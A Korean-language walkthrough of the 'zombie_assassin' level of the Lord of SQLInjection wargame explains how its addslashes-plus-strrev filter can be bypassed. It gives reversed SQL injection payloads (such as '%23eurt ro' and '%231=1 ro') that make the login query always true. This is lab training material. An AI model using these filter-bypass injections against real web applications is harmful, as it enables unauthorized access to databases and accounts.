[LOS] Zombie assassin 풀이(17)

17번째 문제인 "zombie_assassin"입니다.

 

$_GET['id'] = strrev(addslashes($_GET['id']));
$_GET['pw'] = strrev(addslashes($_GET['pw']));

입력된 값을 받는 변수는 "id"와 "pw"가 있습니다.

"addslashes" 함수에 의해 '(싱글 쿼터), "(더블 쿼터), \(역 슬래쉬), null의 입력값에 --> "\"를 추가해줌으로써 단순 "문자열"로 인식하게 만들어주고 있으며 "strrev" 함수가 포함되어 있어 입력받은 문자열을 앞뒤로 바꿔버리고 있습니다/

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");

또한 2가지의 변수에 preg_match 함수를 통해 ' _ . ()를 검증하고 있기 때문에 접근이 쉽지 않습니다.

 

$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
if($result['id']) solve("zombie_assassin"); 

해당 문제를 해결하기 위해선 실행 가능한 완벽한 쿼리문으로 만들기만 하면 되기에 특정 계정이 아닌 아무 계정으로 접근하면 됩니다.

 

succubus 문제처럼 id부터 pw 변수까지 구문을 문자열로 인식하게 해서 우회하고 언제나 "참"으로 되게끔 해주면 될 것 같지만 "addslashes" 함수 덕에 \ -> \\ 로 바뀌어 버리기 때문에 실패합니다.

 

방법을 찾아본 결과 문자열을 뒤집어 주는 "strrev" 함수를 이용해서 임의의 구문을 문자열로 인식하게 할 수 있을 것 같다는 생각이 들었습니다.

 

id='\'' and pw='' ->  id=''\' and pw='' 식으로 입력된 값을 뒤집어 버리는데

 

만일 %00(null) 또는 "(더블 쿼터) 값을 넣게 되면
id='\"' and pw='' -> id='"\' and pw='' or 1=1# 식으로 됩니다. 즉 노란 부분인 id='(싱글 쿼터) ~ pw='(싱글 쿼터) 문자열로 인식하기 때문에 그 뒤의 구문인 " 참 " 값이 바로 실행되게 됩니다.

 

Exploit Code

IN -> select id from prob_zombie_assassin where id=%00&pw=%23eurt ro

OUT -> select id from prob_zombie_assassin where id='0\'&pw='or true #'

 

IN -> select id from prob_zombie_assassin where id="&pw=%231=1 ro

OUT -> select id from prob_zombie_assassin where id='"\' and pw='or 1=1#'